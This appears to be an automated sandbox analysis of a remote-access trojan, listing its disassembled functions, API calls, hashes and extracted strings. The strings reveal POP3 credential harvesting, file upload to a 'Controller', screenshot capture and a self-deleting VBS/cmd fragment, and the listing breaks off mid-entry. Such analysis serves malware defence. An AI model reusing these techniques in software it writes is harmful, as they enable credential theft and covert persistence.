                                                                                                                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                            • API String ID: 3296212668-3023110444
                                                                                                                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                            • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                            • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                            Function 00444F3D Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 296COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$Info
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 2509303402-1979702588
                                                                                                                                            • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                                                            • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                                                            • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                                                            • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                                                            Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                                                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                                                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                                                            • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                                                            • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041B313
                                                                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041B370
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                            • String ID: ?
                                                                                                                                            • API String ID: 3941738427-1684325040
                                                                                                                                            • Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                                            • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                                                            • Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                                            • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                                                            Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strlen
                                                                                                                                            • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                            • API String ID: 4218353326-230879103
                                                                                                                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                            • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                            • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                            Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3899193279-0
                                                                                                                                            • Opcode ID: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                                                                                                                            • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                                                            • Opcode Fuzzy Hash: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                                                                                                                            • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                                                            Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                            • API String ID: 2490988753-744132762
                                                                                                                                            • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                                            • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                                                            • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                                            • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                                                            Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseEnumOpen
                                                                                                                                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                            • API String ID: 1332880857-3714951968
                                                                                                                                            • Opcode ID: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                                                                            • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                                                                            • Opcode Fuzzy Hash: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                                                                            • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                                                                            Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                                                            • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                                                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                                                            • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                                                            • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                                                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                            • String ID: Close
                                                                                                                                            • API String ID: 1657328048-3535843008
                                                                                                                                            • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                            • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                                                            • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                            • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                                                            Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                                            • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                                            • API String ID: 1884690901-3066803209
                                                                                                                                            • Opcode ID: f394d11315419b8f0f9708f62f874e78f478f36e0ca4bb55b67993b1b69a6a64
                                                                                                                                            • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                                                            • Opcode Fuzzy Hash: f394d11315419b8f0f9708f62f874e78f478f36e0ca4bb55b67993b1b69a6a64
                                                                                                                                            • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                                                            Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                            • _free.LIBCMT ref: 10007CFB
                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                            • _free.LIBCMT ref: 10007D1D
                                                                                                                                            • _free.LIBCMT ref: 10007D32
                                                                                                                                            • _free.LIBCMT ref: 10007D3D
                                                                                                                                            • _free.LIBCMT ref: 10007D5F
                                                                                                                                            • _free.LIBCMT ref: 10007D72
                                                                                                                                            • _free.LIBCMT ref: 10007D80
                                                                                                                                            • _free.LIBCMT ref: 10007D8B
                                                                                                                                            • _free.LIBCMT ref: 10007DC3
                                                                                                                                            • _free.LIBCMT ref: 10007DCA
                                                                                                                                            • _free.LIBCMT ref: 10007DE7
                                                                                                                                            • _free.LIBCMT ref: 10007DFF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                            • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                            • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                            • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                            • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                            Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                                                            • _free.LIBCMT ref: 004500A6
                                                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                            • _free.LIBCMT ref: 004500C8
                                                                                                                                            • _free.LIBCMT ref: 004500DD
                                                                                                                                            • _free.LIBCMT ref: 004500E8
                                                                                                                                            • _free.LIBCMT ref: 0045010A
                                                                                                                                            • _free.LIBCMT ref: 0045011D
                                                                                                                                            • _free.LIBCMT ref: 0045012B
                                                                                                                                            • _free.LIBCMT ref: 00450136
                                                                                                                                            • _free.LIBCMT ref: 0045016E
                                                                                                                                            • _free.LIBCMT ref: 00450175
                                                                                                                                            • _free.LIBCMT ref: 00450192
                                                                                                                                            • _free.LIBCMT ref: 004501AA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                            • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                            • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                                                            • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                            • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                                                            Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                                                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                            • API String ID: 489098229-65789007
                                                                                                                                            • Opcode ID: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
                                                                                                                                            • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                                                            • Opcode Fuzzy Hash: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
                                                                                                                                            • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                                                            Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                            • API String ID: 1913171305-390638927
                                                                                                                                            • Opcode ID: dd841bb82cc608f79e660caa83b4a906fc9399d47d9f20e4a7acba44519bdb89
                                                                                                                                            • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                                                            • Opcode Fuzzy Hash: dd841bb82cc608f79e660caa83b4a906fc9399d47d9f20e4a7acba44519bdb89
                                                                                                                                            • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                                            Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                            • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                                                            • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
